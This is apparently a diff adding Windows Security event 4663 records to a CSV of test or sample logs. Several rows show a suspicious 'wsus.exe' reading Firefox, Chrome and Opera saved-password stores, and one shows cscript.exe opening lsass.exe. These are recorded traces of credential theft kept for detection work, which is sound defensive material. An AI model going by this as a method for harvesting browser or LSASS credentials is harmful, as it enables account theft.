+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:31:15.355063Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""68"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:50.134293Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:18.699755Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:05.308188Z"">
+    </TimeCreated>
+    <EventRecordID>4989</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:31:15.355063Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""68"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452905</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452904</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452903</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452902</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452901</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452900</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452899</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452898</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452897</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.325419Z"">
+    </TimeCreated>
+    <EventRecordID>452896</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
